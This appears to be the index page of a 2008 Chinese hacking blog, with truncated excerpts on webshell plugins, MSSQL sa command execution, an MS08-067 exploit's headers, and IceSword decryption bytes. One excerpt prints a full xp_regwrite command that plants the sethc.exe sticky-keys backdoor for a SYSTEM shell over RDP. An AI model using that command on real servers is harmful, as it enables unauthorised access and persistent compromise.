基于Public特权来保护Informix的安全

by amxku
2008-10-29
http://www.amxku.net

在Informix中,有三个数据库特权级别:DBA、Resource 和 Connect
Connect 特权允许用户访问数据库以及添加、修改和删除数据。
Resource 特权授予用户所有 Connect 特权,还授予创建新的表、索引和过程的特权。
DBA 特权包括 Connect 和 Resurce 特权,还授予用户把 Resource、Connect 或DBA 特权授予其他用户的权力。具有DBA 特权的用户还可以删除数据库中的所有对象或完全删除数据库。
阅读全文 »

Tags:

ASPXshell MS08-067插件

作者:cnqing

ASPXshell MS08-067插件
感谢hi群众兄测试,附赠几个插件。。。
1.扫可写目录插件
使用方法:设置扫描起始目录,设置扫描成功N个后停止,扫描。
阅读全文 »

Tags: , , , ,

sa执行命令方法总结

转载请注明来源:BK瞬间群
首发Web安全手册

////////////////////////////////////////////////////////////////////////
                              sa执行命令方法总结

                                 By 无敌小黄瓜
////////////////////////////////////////////////////////////////////////

测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)

一.xp_cmdshell
阅读全文 »

Tags: ,

Anehta — More on Hook Submit:阻塞Method的技巧

作者:

上一篇提到了如何做hook,也讲到了hook表单提交的几种不同方式。

今天要讲的是实现的一点细节。

我们知道,javascript中大部分的method都是非阻塞的,这样的好处是可以提高效率,坏处是很多时候我们确实是需要阻塞的功能。

极少数method是阻塞的,比如 alert()这个函数,在alert()执行完成并返回前,alert()之后的javascript代码都不会执行。
阅读全文 »

Tags:

MS08-067 Remote Stack Overflow Vulnerability Exploit

# 鬼仔:编译好的 ms08067.rar

Author:  Polymorphours
Email:   [email protected]
Homepage:http://www.whitecell.org
Date:    2008-10-28

#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
 阅读全文 »
Tags: , ,

ICESWORD各版本驱动通讯解密代码

作者:MJ0011

icesword同驱动通讯时会将input buffer加密,下面是各版本的解密代码:

包括1.2, 1.18 , 1.2版本的中英文版本

unsigned char is_ddata_en[32] = {
0x10, 0x4F, 0xAC, 0x2D, 0x94, 0x97, 0x95, 0xEE, 0x93, 0x25, 0x8A, 0xB6, 0xD6, 0xBE, 0x49, 0x4D,
0x3F, 0x94, 0x1A, 0x91, 0x30, 0xC4, 0x7B, 0x08, 0x59, 0x38, 0x7C, 0x3B, 0x52, 0x40, 0xD2, 0xD2
};
阅读全文 »

Tags:

3389新思路

版权所有:BK瞬间群
作者:BK群某饮料

1.能修改注册表
2.能访问3389

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

阅读全文 »

Tags: ,

CMD下设置网关

作者:Innfen

上次导数据库的时候不幸把这个导丢了,今天刚好注射攻击的时候,那数据库机器没设置网关,那就自己加一个先试试看了,搞不好可以直接上网了,网关的ip不知道,只好写个批处理来探测,看运气咯
阅读全文 »

Tags: ,